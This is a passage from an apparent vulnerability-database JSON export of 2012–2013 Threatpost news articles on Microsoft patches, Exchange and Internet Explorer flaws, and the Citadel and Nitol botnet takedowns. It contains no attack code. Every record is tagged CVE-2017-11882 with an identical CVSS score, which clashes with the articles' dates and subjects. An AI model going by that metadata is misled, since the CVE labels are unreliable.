Organizations would still be able to send and receive email, but would not be able to search for messages on the server.\n\n\u201cAfter the installation of the security update, the content index for mailbox databases shows as Failed and the Microsoft Exchange Search Host Controller service is renamed,\u201d Microsoft principal program manager Ross Smith said in a [post](<http://blogs.technet.com/b/exchange/archive/2013/08/14/exchange-2013-security-update-ms13-061-status-update.aspx>) on the company\u2019s Exchange site.\n\nSmith added that patches for Exchange 2007 and 2010 were not pulled back because both use a different indexing architecture and are not impacted.\n\nOrganizations that have already installed the patch are urged to follow the steps outlined in a [Knowledge Base article](<http://support.microsoft.com/kb/2879739>) released today as a workaround until a new patch is available. The workaround involves the editing of two separate registry keys.\n\nExperts, however, think the number of companies immediately applying the patch could be relatively low given the criticality of Exchange servers to enterprises. Most likely, an Exchange patch, even a critical one, would have been reserved for a maintenance window overnight or on a weekend.\n\nThe patch was essentially the integration of an Oracle patch released last month for Outside In, a technology that turns unstructured file formats such as PDFs into normalized files. 
Outside In is part of Exchange\u2019s WebReady Document Viewing and Data Loss Prevention features.\n\nAn attacker would be able to exploit the vulnerability in question if a user opened or previewed a malicious file attachment using Outlook Web Access (OWA), giving the attacker the same privileges as the victim on the Exchange Server.\n\n\u201cThis is a fairly important patch in terms of criticality given that it\u2019s the mail server and not a workstation,\u201d said Qualys CTO Wolfgang Kandek.\n\nThe issue is amplified because with the OWA module on Exchange, the browser pulls a message into Exchange and, using Outside In, processes the message on Exchange, exposing the server to attack.\n\nKandek said organizations that don\u2019t allow OWA or that turn off the visualization mode that renders documents are not affected; documents such as PDFs would instead be processed by a reader such as Adobe or Foxit, avoiding the attack vector.\n\nIn the meantime, Kandek said he hopes Microsoft is transparent about the reason for the faulty patch and why it wasn\u2019t caught in testing.\n\n\u201cI think it\u2019s important because we tell people they should install patches as quickly as possible,\u201d Kandek said. 
\u201cWhen a patch breaks, that\u2019s an issue.\u201d\n\nThe Exchange patch was one of three critical bulletins sent out yesterday in Microsoft\u2019s August Patch Tuesday updates.\n", "cvss3": {}, "published": "2013-08-14T16:51:00", "type": "threatpost", "title": "Faulty Microsoft Exchange Server 2013 Patch Pulled Back", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-14T20:51:00", "id": "THREATPOST:44FF4D429457B43FB0FEA96C9A0DE58C", "href": "https://threatpost.com/microsoft-pulls-back-critical-exchange-server-2013-patch/101999/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:20", "description": "Microsoft took less than a month to incorporate an [Oracle Outside In patch](<http://threatpost.com/hefty-oracle-july-critical-patch-update-contains-89-patches/101370>) and fix a critically rated remote code execution bug in Exchange Servers. The Microsoft patch is among three critical bulletins\u2014eight overall\u2014released today as part of [its August 2013 Patch Tuesday security updates](<http://blogs.technet.com/b/msrc/archive/2013/08/13/leaving-las-vegas-and-the-august-2013-security-updates.aspx>).\n\nOracle patched Outside In with its [July Critical Patch Update (CPU)](<http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html#AppendixFMW>); the technology allows developers to turn unstructured file formats into normalized files. [MS13-061](<https://technet.microsoft.com/en-us/security/bulletin/ms13-061>) includes the Outside In Patch, which is part of the WebReady Document Viewing and Data Loss Prevention features on Exchange Servers. Exploits could allow an attacker to remotely execute code if a user previews or opens a malicious file using Outlook Web App (OWA). 
The attacker would have the same privileges as the transcoding services on the Exchange Server; that would be the LocalService account for WebReady Document Viewing and the Filtering Management service for the DLP feature. Both, however, run with minimal privileges.\n\n\u201cIf you run Exchange and your users have OWA, you should address this issue as quickly as possible,\u201d said Qualys CTO Wolfgang Kandek. Microsoft also recommends a workaround that turns off Outside In document processing.\n\n[MS13-059](<https://technet.microsoft.com/en-us/security/bulletin/ms13-059>) is another cumulative patch for Internet Explorer and repairs 11 remotely executable vulnerabilities in the browser, including a sandbox bypass vulnerability discovered and exploited by VUPEN researchers during the Pwn2Own contest in March. IE 6-10 is vulnerable to exploit; Microsoft said it is not aware of any active exploits for any of these vulnerabilities.\n\nThe IE rollup includes patches for nine memory corruption vulnerabilities, as well as fixes for a privilege escalation flaw in the way in which the browser handles process integrity level assignment and an information disclosure cross-site scripting vulnerability in EUC-JP character encoding, Microsoft said.\n\n\u201cAs usual with IE vulnerabilities, the attack vector would be a malicious webpage, either exploited by the attacker or it could be sent to the victim in a spear-phishing e-mail,\u201d Kandek said. \u201cPatch this immediately as the highest priority on your desktop system and wherever your users browse the web.\u201d\n\nThe final critical bulletin, [MS13-060](<https://technet.microsoft.com/en-us/security/bulletin/ms13-060>), patches a Windows vulnerability in the Unicode Scripts Processor; the patch corrects the way Windows parses certain OpenType font characteristics. 
An exploit could allow an attacker to run code remotely if a user opens a malicious document or visits a website that supports OpenType fonts.\n\n\u201cA user would have to be induced to open a malicious file and this only affects Windows XP and 2003,\u201d said Ross Barrett, senior manager of security engineering at Rapid7. \u201cBoth of these issues should be patched ASAP.\u201d Microsoft also recommends two workarounds: either modifying the usp10.dll Access Control List to be more restrictive, or disabling support for parsing embedded fonts in IE.\n\nThe remaining bulletins were all rated Important by Microsoft.\n\n * [MS13-062](<https://technet.microsoft.com/en-us/security/bulletin/ms13-062>) patches a privilege escalation vulnerability in Windows RPC, correcting the manner in which Windows handles asynchronous RPC messages. \u201cPerhaps the most genuinely interesting vulnerability this month,\u201d Barrett said, adding that the bug is a post authentication issue in RPC. \u201cMicrosoft has described this as extremely difficult to exploit, which I can only assume is a challenge to exploit writers everywhere to prove them wrong.\u201d\n * [MS13-063](<https://technet.microsoft.com/en-us/security/bulletin/ms13-063>) is another privilege escalation issue in the Windows kernel. Four vulnerabilities are patched in this bulletin, the most severe of which enables elevated privileges if an attacker is able to log in locally and run a malicious application. In addition to memory corruption bugs, one of the vulnerabilities in this bulletin enables an attacker to bypass Address Space Layout Randomization (ASLR), a memory protection native to the OS.\n * [MS13-064](<https://technet.microsoft.com/en-us/security/bulletin/ms13-064>) patches a denial of service vulnerability in Windows NAT Driver. 
An attacker would have to send a malicious ICMP packet to a server running the NAT Driver services in order to exploit this bug, which affects only Windows Server 2012.\n * [MS13-065](<https://technet.microsoft.com/en-us/security/bulletin/ms13-065>) also fixes a denial of service bug in ICMPv6; Vista, Windows Server 2008, Windows 7, Windows 8, Windows RT and Windows Server 2012 are affected by this bug.\n * [MS13-066](<https://technet.microsoft.com/en-us/security/bulletin/ms13-066>) patches an information-disclosure vulnerability in Active Directory Federation Services on Windows Server 2008 and Windows Server 2012. An exploit could force the service to leak information about the service and allow an attacker to use that information to try to log in remotely.\n", "cvss3": {}, "published": "2013-08-13T14:28:51", "type": "threatpost", "title": "August 2013 Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-13T18:28:51", "id": "THREATPOST:270516BE92D218A333101B23448C3ED3", "href": "https://threatpost.com/microsoft-august-patch-tuesday-addresses-critical-ie-exchange-and-windows-flaws/101981/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:22", "description": "Another month, another set of [Microsoft Patch Tuesday security updates](<http://technet.microsoft.com/en-us/security/bulletin/ms13-aug>) for Internet Explorer.\n\nFor what seems to be the umpteenth month in a row, Microsoft will patch its browser, one of three critical updates expected to be shipped on Tuesday among eight bulletins.\n\nWhile IE patches remain a constant in 2013, IT administrators and network managers also need to be aware of a critical set of patches for Microsoft Exchange Server 2013, as well as 2010 and 2007, both of which are on Service Pack 3.\n\nThe bugs in IE, Exchange Server and the Windows OS are all rated critical 
because they are remotely exploitable; it\u2019s unknown today how many are being actively exploited.\n\n\u201cAcross the board, all supported versions of Microsoft Exchange Server are affected by a critical vulnerability,\u201d said Tripwire security researcher Craig Young. \u201cIf I remember correctly, the last time we saw this was back in February when it was revealed that the transcoding service used to render content for Outlook Web Access sessions could be abused for remote code execution in the context of that service. Exchange servers are invariably connected to the Internet in some form or another so it\u2019s going to be urgent to patch this one post-haste.\u201d\n\n[MS13-012](<http://technet.microsoft.com/en-us/security/bulletin/ms13-012>), released in February, patched [vulnerabilities in the Exchange WebReady Document Viewing](<http://threatpost.com/microsoft-patches-critical-ie-vulnerabilities-021213/77519>) feature; if a user viewed a malicious file through OWA in a browser, an attacker could run code on the Exchange server remotely or crash the server.\n\nRoss Barrett, senior manager of security engineering at Rapid7, said the Exchange patches should be of the greatest concern to organizations.\n\n\u201cIf this is truly a remotely exploitable issue that does not require user interaction, then it\u2019s a potentially wormable issue and definitely should be put at the top of the patching priority list,\u201d Barrett said.\n\nIE, meanwhile, is about to be patched for the eighth time this year including an [out-of-band patch](<http://threatpost.com/out-band-ie-patch-released-more-sites-attacked-011413/77403>) in January to address exploits being used in a number of watering hole attacks.\n\nThe third critical bulletin addresses vulnerabilities in Windows XP and Windows Server 2003 that are remotely exploitable.\n\n\u201cFor some organizations this patch may be of less concern, if they have already moved to newer Windows versions,\u201d Barrett 
said.\n\nThe remaining bulletins are rated \u201cImportant\u201d by Microsoft based on whether they are remotely exploitable and whether exploits are in the wild. All of the \u201cImportant\u201d bulletins patch vulnerabilities in Windows; two of them are privilege escalation bugs, two are denial-of-service vulnerabilities and one is an information disclosure flaw.\n", "cvss3": {}, "published": "2013-08-08T15:28:06", "type": "threatpost", "title": "August 2013 Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-16T18:07:04", "id": "THREATPOST:4C788DAABFE70AE1D1483D4039B3767E", "href": "https://threatpost.com/critical-ie-exchange-updates-on-tap-in-august-patch-tuesday-release/101943/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:36", "description": "Dennis Fisher talks with Ryan Naraine about the new Microsoft bug bounty program, how it may affect prices for vulnerabilities on the private market and why it took the company so long to start the reward program.\n\n<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/07044809/digital_underground_116.mp3>\n\nDownload: [digital_underground_116](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/07044126/digital_underground_116.mp3>)[ \n](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/07044809/digital_underground_116.mp3>)\n", "cvss3": {}, "published": "2013-06-21T09:49:19", "type": "threatpost", "title": "Ryan Naraine on Microsoft's New Bug Bounty Program", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-07-16T20:41:20", "id": "THREATPOST:D49075D6FFF077A542015B7F806F4E27", "href": "https://threatpost.com/ryan-naraine-on-microsofts-bug-bounty-program/101053/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": 
"2018-10-06T23:00:41", "description": "**UPDATE** \u2013 Calling it the company\u2019s \u201cmost aggressive\u201d botnet operation to date, Microsoft has joined with the FBI for a massive disruption of the Citadel botnet.\n\nMore than 1,400 individual botnets associated with the Citadel malware, affecting more than five million people in total, were disrupted, with cooperation from the Federal Bureau of Investigation and, interestingly, a civil seizure warrant issued by the U.S. District Court for the Western District of North Carolina.\n\nGroups like the Financial Services \u2013 Information Sharing and Analysis Center (FS-ISAC), NACHA \u2013 The Electronic Payments Association, the American Bankers Association (ABA) and Agari, an email phishing authentication firm, all helped chip in intelligence as well.\n\nWhile this was the seventh botnet operation of its kind coordinated by Microsoft, this is the first time the company has worked with the law enforcement sector to secure a civil seizure warrant to carry out its plans.\n\nRichard Boscovich, the Assistant General Counsel of Microsoft\u2019s Digital Crimes Unit, wrote about the operation \u2013 codenamed Operation b54 \u2013 on [the company\u2019s Technet blog](<http://blogs.technet.com/b/microsoft_blog/archive/2013/06/05/microsoft-works-with-financial-services-industry-leaders-law-enforcement-and-others-to-disrupt-massive-financial-cybercrime-ring.aspx>) last night, claiming the action won\u2019t fully eradicate the Citadel malware but should \u201csignificantly\u201d curb the botnet going forward.\n\n\u201cDue to Citadel\u2019s size and complexity, we do not expect to fully take out all of the botnets in the world using the Citadel malware,\u201d he wrote, \u201chowever, we do expect that this action will significantly disrupt Citadel\u2019s operation.\u201d\n\nTechnical details on the operation are somewhat scant, but Microsoft says the operation culminated yesterday after officials from Microsoft, 
assisted by U.S. Marshals, helped remove servers from two data hosting facilities in New Jersey and Pennsylvania. The takedown was set into motion last week after the North Carolina court order successfully cut off communication between the Citadel botnets, 1,462 in total, and their infected machines.\n\nAgari, a Palo Alto-based email phishing authentication firm, had a big hand in helping Microsoft obtain the seizure warrant.\n\nWhile the full operation took about a year, Agari spent six of those months poring over phishing emails that were pulling unsuspecting users into the Citadel botnet.\n\nAgari CEO Patrick Peterson described how the company helped monitor emails that led to the seizure of the servers in Pennsylvania and New Jersey.\n\n\u201cOur whole system is designed to isolate these malicious emails and to get that forensic data for law enforcement, for our customers, for the industry to be able to track the bad guys,\u201d Peterson explained. \u201cIn this case, working with our partners, the FBI, Microsoft, FS-ISAC, we were able to customize the focus of that specifically around that Citadel botnet.\u201d\n\nThe company monitored approximately 2.5 million malicious URLs every month, and while not every one of those URLs led to the Citadel malware, all of them were pretending to come from a legitimate bank.\n\nAgari is part of FS-ISAC\u2019s Trusted Registry Program, a program dedicated to securing the emails the financial services industry sends out. 
FS-ISAC reached out to Microsoft about Agari\u2019s wealth of phishing emails and the company joined the investigation from there.\n\n\u201cI think it\u2019s a great day for everyone involved,\u201d Peterson said. \u201cIt\u2019s certainly a day when everyone on the internet is safer than they were yesterday and that doesn\u2019t happen very often.\u201d\n\nThe Citadel Trojan has been spotted mining all types of financial information, including banking logins and passwords, since [being introduced a year and a half ago](<http://threatpost.com/citadel-malware-authors-adopt-open-source-development-model-020812/>). To date it\u2019s believed the botnet is responsible for more than half a billion dollars in financial loss.\n\nPeddled primarily on a handful of underground forums as a variant of the Zeus Trojan, the malware has long been cloaked in secrecy. Owners insist on distributing their kit among trusted insiders, [hoping to keep law enforcement out and support costs down](<http://threatpost.com/citadel-trojan-updates-dynamic-config-mechanism-streamlines-fraud-activity-101812/>).\n\nMicrosoft has taken a hard line on cybercrime over the last several years and much of that is due to [the work being done by its Digital Crimes Unit](<http://threatpost.com/at-microsoft-a-sharpened-focus-on-cybercrime/>). The DCU, a collection of Microsoft engineers, security experts and lawyers, has proved successful at shutting down botnets that are largely dependent on a centralized infrastructure, including Kelihos, Zeus, Waledac and Rustock.\n\nIn [a discussion with Threatpost\u2019s Dennis Fisher last month](<http://threatpost.com/qa-microsofts-tj-campana/>), T.J. Campana, the DCU\u2019s Director of Security, claimed the group tries to take a transparent approach with their takedowns.\n\n\u201cWe\u2019re not just going out there shooting stuff. We walk in with a pile of legal documents. 
We\u2019re asking for a judge to agree with what we found,\u201d Campana said of the group\u2019s actions at the time.\n", "cvss3": {}, "published": "2013-06-06T13:38:55", "type": "threatpost", "title": "Operation b54 Knocks 1,000+ Citadel Botnets Offline", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-06-10T19:43:44", "id": "THREATPOST:AD20F9744EB0E2E4D282F681451B4FBD", "href": "https://threatpost.com/microsoft-authorities-disrupt-hundreds-of-citadel-botnets-with-operation-b54/100902/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:02", "description": "Microsoft announced Wednesday it will tweak the release of its forthcoming Windows 8 operating system to comply with the European Commission, which argues that in its current state, the software fails to offer customers a browser choice screen to let them \u201ceasily choose their preferred web browser.\u201d\n\nThe browser choice issue was also present in Windows 7 and, according to European Union antitrust commissioner Joaquin Almunia this morning, the EU has been in contact with Microsoft to ensure it doesn\u2019t repeat the same mistake.\n\nAccording to reports, Microsoft was advised to remedy the issue \u201cif they don\u2019t want to take the risk of a new investigation,\u201d Almunia [warned at a press conference earlier today](<http://www.google.com/hostednews/afp/article/ALeqM5iXITc3iybCliakA7TZ496XmzPS5g?docId=CNG.8bb0ab94569c4cff3a09e64804358eaa.441>).\n\nThe EU initially took issue with the fact that Microsoft\u2019s Windows 7 Service Pack 1, released in February 2011, failed to offer users a choice, something the company has been legally bound to do in Europe since December 2009. 
After that ruling, the EU mandated that Microsoft display a choice screen to \u201caddress competition concerns.\u201d While the choice screen popped up in March 2010 as part of a five-year agreement, from February 2011 to July 2012 the \u201cchoice screen\u201d disappeared from Windows.\n\n\u201cIf infringements are confirmed, Microsoft should expect sanctions,\u201d [Almunia warned in July](<http://europa.eu/rapid/press-release_IP-12-800_en.htm?locale=en>), when proceedings against Microsoft over the most recent issue were opened.\n\nMicrosoft claimed the lack of a \u201cchoice screen\u201d was due to a technical error and claims it has taken steps to ensure the problem doesn\u2019t happen again. It will implement changes to Windows 8 before its release later this week, [the company acknowledged in a press release today](<http://www.microsoft.com/en-us/news/Press/2012/Oct12/10-24statement.aspx>).\n\nIn the U.S., Windows 8 is slated for release on Friday, while a tweaked version, Windows 8 Pro N, will be released in Europe without Windows Media Player. Similar to the browser choice ruling, the EU ruled in 2004\u2019s \u201cMicrosoft competition case\u201d that tying the player to Windows was an \u201cabuse of a dominant position.\u201d In response, Microsoft had to release a version of its Windows software [with its flagship media player stripped out](<http://www.law.yale.edu/documents/pdf/The_Economists_Voice.pdf>). (.PDF)\n\nThe EU is known for taking a tougher stance toward user privacy than the U.S., along with enforcing its competition law \u2014 a law that is effectively the equivalent of the U.S.\u2019s antitrust law. The commission fined Microsoft twice, [in 2004 and 2008](<http://news.bbc.co.uk/2/hi/business/7266629.stm>), after it determined it had gained unfair market advantage with its Windows platform. 
\n", "cvss3": {}, "published": "2012-10-24T19:01:05", "type": "threatpost", "title": "Microsoft Agrees to Modify Windows 8 Following EU Complaint", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:20", "id": "THREATPOST:61AC6ABD7798785567FFEEBEF573CDF8", "href": "https://threatpost.com/microsoft-agrees-modify-windows-8-following-eu-complaint-102412/77151/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:02", "description": "[](<https://threatpost.com/nitol-infections-fall-malware-still-popping-102412/>)When Microsoft went after the [Nitol botnet](<https://threatpost.com/microsoft-carries-out-nitol-botnet-takedown-091312/>) in September, one of the key details in the investigation was the fact that much of the botnet was built by pre-loading malware onto laptops during the manufacturing process in China. This was the clearest case yet of the phenomenon of [certified pre-owned devices](<https://threatpost.com/new-study-sees-need-better-software-integrity-controls-061410/>) making their way through the supply chain and into the market. As it turns out, nearly half a million of those infected machines showed up here in the U.S.\n\nResearch from Microsoft into the location of the Nitol-infected machines shows that the large majority of them are in China, nearly 800,000 of them. That\u2019s more than 30 percent of all of the machines on which Microsoft detected the Nitol malware, and the company said that about one in every five machines purchased in China through the compromised supply chain had malware on it.\n\nAlthough the number of infected systems in the United States wasn\u2019t nearly as high as in China, Microsoft did find nearly 500,000 PCs in the U.S. 
loaded with Nitol, a pretty significant volume of infections.\n\n\u201cMMPC\u2019s infection figures for [Win32/Nitol](<http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Win32/Nitol> \"MMPC Encyclopedia entry for Win32/Nitol\" ) reflect the Microsoft study, placing China on the top spot with a whopping 31.60%, way above the United States (18.51%) and Taiwan (16.79%). Thailand and Korea round out the top five,\u201d wrote [Rex Plantodo of the Microsoft Malware Protection Center.](<https://blogs.technet.com/b/mmpc/archive/2012/10/22/msrt-october-12-nitol-by-the-numbers.aspx?Redirected=true>)\n\nMicrosoft began looking into the Nitol botnet more than a year ago after buying 20 laptops in China and discovering that some of them had been pre-loaded with the Nitol malware, as well as a few other pieces of malicious software. Nitol is a nasty bit of code and has quite a list of malicious capabilities. It has rootkit functionality and also can launch DDoS attacks on orders from a remote command-and-control server.\n\nMicrosoft\u2019s takedown of Nitol disrupted much of the botnet\u2019s operations, but it didn\u2019t completely eliminate it. 
The company\u2019s detections show a major drop in Nitol infections since September, but there are still more than 200,000 infections in October.\n\n", "cvss3": {}, "published": "2012-10-24T17:59:06", "type": "threatpost", "title": "Nitol Infections Fall, But Malware Still Popping Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:20", "id": "THREATPOST:C35731BF3D4A3F8D0B1A838FAD1A8832", "href": "https://threatpost.com/nitol-infections-fall-malware-still-popping-102412/77149/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:08", "description": "Microsoft will release seven bulletins in the [October Patch Tuesday](<http://technet.microsoft.com/en-us/security/bulletin/ms12-oct>) next week, fixing 20 total vulnerabilities in Windows, Office, Lync and SQL Server. Only one of the bulletins is rated critical, while the six others are rated important.\n\nThe one critical bulletin affects Microsoft Office 2003, 2007 and 2010 and Microsoft officials said that the bug it will fix can be used for remote code execution. The remaining six bulletins, which all are rated important, also can be used for remote code execution. \n\nThe other software affected by the October bulletins includes SharePoint, Groove Server, SQL Server 2000, 2005, 2008 and 2012. \n\nThe one critical bulletin will fix a flaw in Microsoft Word, company officials said.\n\n\u201cToday we\u2019re providing [advance notification](<http://technet.microsoft.com/security/bulletin/ms12-oct>) of the release of seven bulletins, one Critical and six Important, which address 20 vulnerabilities for October 2012. The Critical bulletin addresses vulnerabilities in Microsoft Word. The six Important-rated bulletins will address issues in Windows, Microsoft Office, and SQL Server. 
This release will also address the issue in FAST Search Server first described in [Security Advisory 2737111](<http://technet.microsoft.com/security/advisory/2737111>),\u201d Dustin Childs of Microsoft said.\n\nThat bug in FAST Search Server first came to light in July and also existed in Microsoft Exchange Server. \n\n\u201cThe vulnerabilities exist due to the way that files are parsed by the third-party, Oracle Outside In libraries. In the most severe case of Microsoft Exchange Server 2007 and Microsoft Exchange Server 2010, it is possible under certain conditions for the vulnerabilities to allow an attacker to take control of the server process that is parsing a specially crafted file. An attacker could then install programs; view, change, or delete data; or take any other action that the server process has access to do,\u201d Microsoft said in its security advisory at the time.\n", "cvss3": {}, "published": "2012-10-04T18:28:36", "type": "threatpost", "title": "Microsoft to Fix Critical Word Flaw in October Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:25", "id": "THREATPOST:A054939E56572665B8DD31C2FF1D6A79", "href": "https://threatpost.com/microsoft-fix-critical-word-flaw-october-patch-tuesday-100412/77083/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:00", "description": "[](<https://threatpost.com/ten-years-after-gatess-memo-effects-still-being-felt-011212/>)Ten years.\n\nThat\u2019s a really long time. Think about what you were doing 10 years ago. Can you even remember? Maybe you were in college or high school, or cripes, even grade school. Or maybe you were working in security already, trying to figure out why your network kept getting overrun by viruses and attackers. 
You know what Microsoft was doing 10 years ago?

Making really, really buggy software and watching its customers get owned left and right.

The early part of the 2000s was not a good time for the folks in Redmond. The company was taking a serious public beating for the instability and insecurity of its software, especially Internet Explorer, Outlook and Windows. Macro and VBScript viruses such as Melissa, ILOVEYOU and others were running wild, and large enterprise customers were screaming and pounding their shoes on the table and demanding answers from Microsoft.

And Microsoft didn’t have any.

The company had spent the last few years defending itself against the [Department of Justice’s antitrust suit](<https://en.wikipedia.org/wiki/United_States_v._Microsoft>) centered on its Windows-IE monopoly. Much of its energy and resources–not to mention money–were devoted to the case, which Microsoft lost at trial and eventually settled. Then, when the dust settled and company officials began looking around to see what had been going on while they were buried in federal courtrooms for three years, what they found was something like the information age version of the angry mob of villagers with torches and pitchforks.

To say that customers were not happy would be like saying Bill Gates has some money tucked away.

As it turned out, it was Gates himself who would provide the spark that would ultimately light a fire under the thousands of developers, product managers and engineers in Redmond to make security not just a priority, but the priority.

The email that Gates sent on Jan. 15, 2002, has come to be known as the [Trustworthy Computing memo](<https://threatpost.com/what-if-bill-gates-never-wrote-trustworthy-computing-memo-022410/>) and it is often pointed to as the origin of any sort of security awareness at Microsoft. But that’s not really the case. [Gates’s email](<http://www.computerbytesman.com/security/billsmemo.htm>) may have been the first real public expression of that sentiment, but some people inside the company had been thinking along those lines for some time.

The first step is admitting you have a problem, of course. But then you have to do something about it.

A few months before Gates sent his email, Microsoft held a small conference in Redmond on what it then called trusted computing, bringing in a series of software security experts to discuss the principles and concepts that are the foundation of building more secure software. There were a few reporters there and some security researchers, and the fascinating thing about it was that it was not Microsoft officials preaching their ideas to the audience, but trying to learn from the assembled experts. Odd.

And well before Gates pushed the button on his email, there were people inside the company talking about the same concepts–reliability, robustness and resistance to attack–and advocating that developers build their applications around them.

In the months following the publication of Gates’s email, Microsoft began a number of painful internal changes designed to refocus its developers around the idea of building secure software. Until then, the ship-or-die mentality had reigned supreme inside the company, and features and functionality were the two-headed god that every developer worshipped. The chances of a team stopping shipment because of a security problem at that point were zero point zero zero.

But within a few months of Gates’s memo, that’s exactly what happened. The company stopped development on several major products in order to put their developers through security training. Since then, the company has developed and released a slew of software security tools and methodologies and somehow turned Microsoft from the butt of every joke in the industry into an organization that’s seen as doing it the right way.

But it wasn’t just Microsoft that began changing in those days. The turnaround initiated by the company and Gates also took hold in the wider software industry and other industries, albeit much more slowly and spottily. After Microsoft’s public declaration of the need for change, the sentiment began to spread to some of its larger customers. Then, more and more financial services firms, insurance companies, telecoms and other companies got on board, starting their own software security programs.

By the middle to latter part of the decade, Microsoft not only wasn’t the object of every joke in the security community, it was being used as an example of how to do things right, how to get your collective stuff together and fix what’s broken.

So, what Gates’s memo turned out to be was not just a directive for Microsoft developers, but a call to arms for the rest of the industry, as well. It was by no means the beginning of the software security movement. Not even close.
But it was, in fact, the beginning of something different and perhaps more important: widespread acceptance that software security needed to be a top priority.

Even for Microsoft.

*Microsoft homepage image via [SeattleClouds.com](<http://www.flickr.com/photos/42106306@N00/>)’s Flickr photostream*

## Microsoft Aims to Make Life Harder, More Expensive For Attackers

*Threatpost, published 2012-01-13: <https://threatpost.com/microsoft-aims-make-life-harder-more-expensive-attackers-011312/76094/>*

MIAMI BEACH–It’s been a decade now since Microsoft began focusing on product security as a top priority, and there have been a lot of successes and some failures along the way. But in that time, one of the things that most definitely has changed as a result of the Trustworthy Computing program is how difficult and expensive it’s become for attackers to compromise Windows machines. That’s not to say, however, that the fight has been won. It’s only beginning, in fact, a senior Microsoft security official said.

There are a lot of bits and pieces that make up [Microsoft’s Trustworthy Computing](<https://threatpost.com/ten-years-after-gatess-memo-effects-still-being-felt-011212/>) efforts, from developer training to exploit mitigations to outreach to the security researchers who spend their time attacking the company’s products. But the one thing that all of these initiatives have in common is that they’re focused on increasing the time, effort and investment it takes for an attacker to compromise one of their products.
Increasing that degree of difficulty and level of spending by even small increments can provide much larger gains on the defensive side.

“For stealthy, reliable exploits, you need a lot of R&D and they’re shorter-lived now. It’s getting harder to find bugs and exploits,” Andrew Cushman, senior director of Trustworthy Computing security at Microsoft, said in his keynote talk at the Infiltrate conference here Friday. “The defender’s ethos is to increase attacker investment. Copy what works and keep plugging away. We’re in this for the long haul.”

Although the famous directive from Bill Gates on Trustworthy Computing went out in 2002, one of the first real watershed moments in the company’s efforts to lock down its products was the release of Windows XP SP2 in 2004. That was the first version of the OS to have the Windows firewall turned on by default, and it included other security upgrades as well. Cushman pointed to that as an inflection point for both Microsoft and the attackers who target its systems.

“Pre-XP SP2 was the golden age for exploits. Things have only gotten harder since then,” he said. “Those were the days. It was then that the executives said, we’re going to take the steps that are necessary to fix this.”

Those changes were not limited to Windows products, though. The company’s IIS Web server was a frequent and easy target for attackers in the early part of the decade, and that fact did not escape senior management at Microsoft.

“One of the low points of my career is when Jim Allchin stood up in a meeting and said IIS was a threat to Windows,” Cushman said.

Things have certainly changed since then, but that doesn’t mean that all is sweetness and light for Microsoft or the Internet at large. Sure, it’s become progressively more difficult to find and reliably exploit vulnerabilities in many platforms, but there are still plenty of other systems out there that haven’t caught up. And though life may be more challenging for the dedicated attackers and offensive teams out there, they’re not out of business by any means.

“Attackers are being squeezed from the top and the bottom. But low-skill exploits never go out of style. There’s lots of low-hanging fruit out there, 1990s technology,” Cushman said. “But for high skill exploits, the barrier to entry is growing. And there’s no shortage of vulnerable technologies that are going to come online in the next few years.”

Despite all of the changes, Cushman said, one thing has remained the same throughout the years.

“Attackers are never going to go away,” he said.

## Microsoft Fixes BEAST SSL Bug in January Patch Tuesday

*Threatpost, published 2012-01-10: <https://threatpost.com/microsoft-fixes-beast-ssl-bug-january-patch-tuesday-011012/76083/>*

Microsoft on Tuesday patched the vulnerability in Windows that was exploited by the [BEAST SSL attack](<https://threatpost.com/new-attack-breaks-confidentiality-model-ssl-allows-theft-encrypted-cookies-091911/>) tool developed by Juliano Rizzo and Thai Duong last year.
The patch is one of several rated important that Microsoft issued in [January’s Patch Tuesday](<https://technet.microsoft.com/en-us/security/bulletin/ms12-jan>) release, and there was also a critical bulletin, fixing two separate vulnerabilities in Windows Media Player.

